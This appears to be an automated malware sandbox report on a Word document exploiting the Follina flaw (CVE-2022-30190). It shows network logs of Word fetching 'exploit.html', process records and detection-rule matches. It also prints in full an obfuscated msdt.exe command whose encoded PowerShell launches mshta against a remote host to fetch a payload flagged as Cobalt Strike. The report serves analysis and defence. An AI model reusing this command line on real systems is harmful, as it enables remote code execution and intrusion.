                                                                                                                                                                            Jun 16, 2022 14:21:44.602528095 CEST7317INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:21:44 GMT
                                                                                                                                                                            Content-type: application/octet-stream
                                                                                                                                                                            Content-Length: 21824
                                                                                                                                                                            Last-Modified: Mon, 13 Jun 2022 15:06:36 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            2192.168.2.349748101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:06.190567017 CEST1296OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Jun 16, 2022 14:20:06.419333935 CEST1296INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:06 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                            Content-Length: 500


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            3192.168.2.349749101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:06.751089096 CEST1298OUTGET /exploit.html HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 16, 2022 14:20:06.982336998 CEST1299INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:06 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            4192.168.2.349750101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:07.395937920 CEST1305OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 16, 2022 14:20:07.629883051 CEST1306INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:07 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            5192.168.2.349751101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:08.133632898 CEST1306OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 16, 2022 14:20:08.362894058 CEST1307INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:08 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            6192.168.2.349752101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:08.643004894 CEST1307OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Jun 16, 2022 14:20:08.870100975 CEST1308INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:08 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                            Content-Length: 500


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            7192.168.2.349753101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:09.125781059 CEST1309OUTHEAD /exploit.html HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Jun 16, 2022 14:20:09.344546080 CEST1309INHTTP/1.0 200 OK
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:09 GMT
                                                                                                                                                                            Content-type: text/html
                                                                                                                                                                            Content-Length: 5737
                                                                                                                                                                            Last-Modified: Tue, 14 Jun 2022 15:37:10 GMT


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            8192.168.2.349754101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:09.596090078 CEST1310OUTOPTIONS / HTTP/1.1
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Authorization: Bearer
                                                                                                                                                                            User-Agent: Microsoft Office Word 2014
                                                                                                                                                                            X-Office-Major-Version: 16
                                                                                                                                                                            X-MS-CookieUri-Requested: t
                                                                                                                                                                            X-FeatureVersion: 1
                                                                                                                                                                            X-MSGETWEBURL: t
                                                                                                                                                                            X-IDCRL_ACCEPTED: t
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            Jun 16, 2022 14:20:09.821291924 CEST1310INHTTP/1.0 501 Unsupported method ('OPTIONS')
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:09 GMT
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                            Content-Length: 500


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            9192.168.2.349755101.33.231.8162563C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Jun 16, 2022 14:20:10.060765028 CEST1311OUTGET /exploit.html HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            Host: 101.33.231.81:62563
                                                                                                                                                                            If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Jun 16, 2022 14:20:10.292975903 CEST1312INHTTP/1.0 304 Not Modified
                                                                                                                                                                            Server: SimpleHTTP/0.6 Python/3.9.9
                                                                                                                                                                            Date: Thu, 16 Jun 2022 12:20:10 GMT


                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Target ID:0
                                                                                                                                                                            Start time:14:19:55
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                            Imagebase:0xbb0000
                                                                                                                                                                            File size:1937688 bytes
                                                                                                                                                                            MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Target ID:2
                                                                                                                                                                            Start time:14:20:01
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
                                                                                                                                                                            Imagebase:0x8d0000
                                                                                                                                                                            File size:466688 bytes
                                                                                                                                                                            MD5 hash:EA19F4A0D18162BE3A0C8DAD249ADE8C
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:9
                                                                                                                                                                            Start time:14:20:14
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
                                                                                                                                                                            Imagebase:0x1180000
                                                                                                                                                                            File size:1508352 bytes
                                                                                                                                                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                            • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 00000009.00000002.556829484.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:18
                                                                                                                                                                            Start time:14:20:43
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline
                                                                                                                                                                            Imagebase:0x140000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:19
                                                                                                                                                                            Start time:14:20:45
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"
                                                                                                                                                                            Imagebase:0xc60000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:20
                                                                                                                                                                            Start time:14:21:20
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline
                                                                                                                                                                            Imagebase:0x140000
                                                                                                                                                                            File size:2170976 bytes
                                                                                                                                                                            MD5 hash:350C52F71BDED7B99668585C15D70EEA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:21
                                                                                                                                                                            Start time:14:21:28
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"
                                                                                                                                                                            Imagebase:0xc60000
                                                                                                                                                                            File size:43176 bytes
                                                                                                                                                                            MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:moderate

                                                                                                                                                                            Target ID:25
                                                                                                                                                                            Start time:14:21:41
                                                                                                                                                                            Start date:16/06/2022
                                                                                                                                                                            Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:"C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta
                                                                                                                                                                            Imagebase:0xd30000
                                                                                                                                                                            File size:13312 bytes
                                                                                                                                                                            MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Yara matches:
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506676110.000000000626D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499865318.0000000006E54000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.498703501.000000000583F000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500021102.0000000006E34000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500164196.0000000006E17000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509313999.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499436698.0000000006E9B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500090549.0000000006E2A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500504965.0000000006DD2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499684731.0000000006E71000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509423270.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500246766.0000000006E08000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568757163.0000000006E43000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505927561.000000000636D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500477251.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508961693.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500075794.0000000006E2E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499611659.0000000006E81000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500491953.0000000006DD5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499493418.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508307572.0000000005E40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500524387.0000000006DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500409413.0000000006DE2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503297847.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500310887.0000000006DF5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505719347.0000000006392000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500548113.0000000006DC9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500261822.0000000006E04000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500418706.0000000006DDF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568673308.0000000006E23000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507852725.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568682358.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508838061.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499473983.0000000006E97000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500155514.0000000006E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499623622.0000000006E7E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508459967.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568748602.0000000006E40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568710134.0000000006E30000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507100056.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499889442.0000000006E4D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506175810.00000000062EE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508628056.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499641627.0000000006E7A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499824941.0000000006E5D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506705393.000000000618E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                                                            • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501596100.0000000006A80000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
